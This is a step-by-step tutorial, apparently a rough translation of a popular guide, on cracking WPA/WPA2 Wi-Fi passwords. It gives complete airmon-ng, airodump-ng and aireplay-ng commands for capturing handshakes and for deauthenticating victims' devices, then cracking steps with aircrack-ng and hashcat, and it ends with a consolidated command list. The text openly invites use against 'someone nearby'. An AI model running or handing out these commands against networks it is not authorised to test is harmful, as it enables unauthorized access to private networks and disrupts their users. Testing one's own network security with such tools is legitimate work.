Hacking WPA / WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng / Hashcat

This is a quick walkthrough that demonstrates how to hack Wi-Fi networks protected by weak passwords. It is not exhaustive, but this information should be enough for you to test your own network security or hack someone nearby. The attack described below is completely passive (only listening, nothing is transmitted from your computer) and it is impossible to know about it unless you really use the password that has been hacked. An optional active attack with deauthentication can be used to speed up the intelligence process. It is described at the end of the article.



If you are familiar with the process, you can skip the descriptions and go directly to the list of commands at the end. A variety of suggestions and alternative methods are listed in the app .



DISCLAIMER: This software / manual is intended for educational purposes only. It can not be used for illegal activity. The author is not responsible for its use. Don't be a freak.

To start

This guide assumes that you:

')

• In general, do not experience problems using the command line.
• You work in a Debian-based Linux distribution, preferably Kali linux (for OS X users, see the appendix ).
• You have Aircrack-ng installed
  
  
  • sudo apt-get install aircrack-ng
• Your wireless card supports monitor mode (see the list of compatible devices).

Hacking a Wi-Fi network

Monitor mode

Let's start with a list of wireless interfaces that support monitor mode:



airmon-ng



If you do not see the interfaces in the list, then your card does not support monitor mode. :(



Suppose your interface name is wlan0, but use the real name if it is different from this. Next, let's translate the interface into monitor mode:



airmon-ng start wlan0



Run iwconfig . You should now see the new monitor interface (most likely mon0 or wlan0mon ).

Find target

Start listening to the broadcast of the malfunction frames of the surrounding wireless routers using your monitor interface:



airodump-ng mon0



You should see something like this.

 CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0> 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2 78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca 

Capture 4-Way Handshake

WPA / WPA2 uses a 4-way handshake to authenticate devices on the network. It doesn't matter what it means, but you need to grab one of these handshakes to crack the network password. These handshakes occur every time devices are connected to the network, for example, when your neighbor returns home from work. To intercept a handshake, we send airmon-ng to monitor traffic on the target network, using the channel values ​​and bssid received by the previous command.



# replace -c and --bssid values with the values of your target network

# -w specifies the directory where we will save the packet capture

airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0

  CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS 

Now we are waiting ... As soon as the handshake is captured, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 in the upper right corner of the screen, next to the current time.



If you can not wait and you agree to an active attack, you can force the devices on the network to reconnect, forcibly disconnecting them. To do this, they need to send malicious packets to deauthenticate. This often leads to the interception of a 4-way handshake. See the section on the attack with deauthentication below.



Once you've grabbed the handshake, press ctrl-c to exit airodump-ng . You will see the .cap file where you have specified airodump-ng to save the captures (most likely, it is called -01.cap ). We use this interception file to crack the network password. I like to change the name of the file in accordance with the name of the network, which we will hack:



mv ./-01.cap hackme.cap

Breaking the network password

The last step is to crack the password using the intercepted handshake. If you have access to the GPU, I highly recommend using hashcat to crack the password. I created a simple tool that makes using hashcat very easy: it is called naive-hashcat . If you do not have access to the GPU, you can use various online GPU-services for hacking, such as GPUHASH.me or OnlineHashCrack . You can also try using a brutforce CPU using Aircrack-ng.



Please note that both attack methods below suggest a relatively simple user password. Most WPA / WPA2 routers come with strong 12-digit random passwords, which most users leave unchanged (and rightly so). If you are trying to crack one of these passwords, I recommend using WPA-length Probable-Wordlists dictionary files.



Hacking with naive-hashcat (recommended method)

Before you start cracking a password using naive-hashcat, you need to convert our .cap file to the equivalent hashcat format for .hccapx . This is easy to do by either uploading the .cap file to https://hashcat.net/cap2hccapx/ , or directly using the cap2hccapx tool.



cap2hccapx.bin hackme.cap hackme.hccapx



Then we download and run naive-hashcat :



# download

git clone https://github.com/brannondorsey/naive-hashcat

cd naive-hashcat



# download the 134MB rockyou dictionary file

curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt



# crack ! baby ! crack !

# 2500 is the hashcat hash mode for WPA/WPA2

HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh



Naive-hashcat uses various dictionaries , rules , combinations and masks (smart brute force) to conduct an attack. A password attack of medium difficulty can take days or even months. The hacked password will be saved in hackme.pot, so periodically check this file. As soon as the password is cracked, you will see something like this in POT_FILE :



e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet



Where the last two fields are separated : represent the network name and password, respectively.



If you prefer to use hashcat without naive-hashcat , then see this page .



Hacking with Aircrack-ng

Aircrack-ng can be used for the simplest dictionary attacks by the CPU. Before the attack, you need to get a list of words. I recommend using the famous rockyou dictionary file:



# download the 134MB rockyou dictionary file

curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt



Please note that if the network password is missing among the words in the file, then you will not crack it.



# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile

aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap



As soon as the password is cracked, you will see the message KEY FOUND! in the terminal window KEY FOUND! followed by a password in text form.

  Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ hacktheplanet ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4 

Deauthentication Attack

An attack with deauthentication involves sending fake packets to deauthenticate from your machine to a client connected to the network you are trying to hack. These packets include fake sender addresses, so the client thinks they are sent from real access points. After receiving such a package, most customers disconnect from the network and immediately reconnect, providing you with the opportunity to participate in a 4-way handshake if you monitor using airodump-ng .



Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC ) until the client ( STATION ) connects. The connected client looks like this, where 64:BC:0C:48:97:F7 its MAC address is:

  CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS BSSID STATION PWR Rate Lost Frames Probe 9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS 

Now we’ll leave airodump-ng to work, and we’ll open a new console window ourselves. We use the aireplay-ng command to send a packet to deauthenticate to the victim, forcing him to reconnect to the network, and we hope for a handshake.



# -0 2 specifies we would like to send 2 deauth packets. Increase this number

# if need be with the risk of noticeably interrupting client network activity

# -a is the MAC of the access point

# -c is the MAC of the client

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0



Alternatively, you can broadcast deauthentication packets to all customers around:



# not all clients respect broadcast deauths though

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0



Once you have sent the packages, go back to the airodump-ng process, and if you are lucky, you will see at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0 . Now you have taken the handshake and you can start hacking the network password.

Command list

Below is a list of all the commands that are needed to hack a WPA / WPA2 network, in order, with a minimum description.



# put your network device into monitor mode

airmon-ng start wlan0



# listen for all nearby beacon frames to get target BSSID and channel

airodump-ng mon0



# start listening for the handshake

airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0



# optionally deauth a connected client to force a handshake

aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0



########## crack password with aircrack-ng... ##########



# download 134MB rockyou.txt dictionary file if needed

curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt



# crack w/ aircrack-ng

aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap



########## or crack password with naive-hashcat ##########



# convert cap to hccapx

cap2hccapx.bin capture/-01.cap capture/-01.hccapx



# crack with naive-hashcat

HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

application

The feedback on this guide was so great that I added tips and additional material from community members to the supplemental app . Study it to find out how:

• Intercept handshakes and crack WPA passwords on MacOS / OSX
• Catch handshakes from all networks around with wlandump-ng
• Use crunch to generate on-the-fly vocabulary lists of 100 GB or more.
• Forge your MAC address with macchanger

Authorship

The bulk of the information here is drawn from the magnificent leadership of Lewis Encarnacion . Thanks also to Aircrack-ng and Hashcat authors and maintainers.



Many thanks neal1991 for translating this guide into Chinese . Also, thank hiteshnayak305 , enilfodne , DrinkMoreCodeMore , hivie7510 , cprogrammer1994 , 0XE4 , Hartzell , zeeshanu , flennic , bhusang , tversteeg , gpetrousov , crowchirp and Shark0der with Reddit and GitHub, which also helped councils and typos. If you're interested in learning about additional WPA2 hacking options, read this discussion on Hacker News.